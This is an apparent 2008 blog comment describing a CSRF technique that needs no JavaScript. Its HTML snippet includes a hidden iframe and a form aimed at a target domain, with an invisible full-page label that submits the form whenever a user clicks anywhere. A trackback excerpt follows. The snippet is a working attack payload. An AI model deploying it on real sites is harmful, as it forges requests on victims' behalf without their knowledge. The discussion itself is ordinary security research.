I found this post very interesting for a number of reasons. Mainly because the label / input relationship is behaviour driven by HTML, which shouldn’t really be happening. After looking at this a bit, I made a variation (more focused on villainish sneakery) that will allow the transparent submission of a form to an iframe if the user clicks anywhere on the page, without the aid of JavaScript, just as in rvdh’s example. Plenty of nastniess can ensue.
code!
<iframe name="my_frame" src="" style="display:none"></iframe> <form action="http://targetdomain.com" target="my_frame"> <p> <label for="submit" style="position:fixed;top:0;right:0;bottom:0;left:0"> </label> <input type="submit" id="submit" style="display:none"/> </p> </form>
October 5th, 2008 at 9:54 am
[...] [3] http://www.0×000000.com/index.php?i=312 [4] http://trickeries.com/216/an-interesting-csrf-attack/ source: OWASP News Share and [...]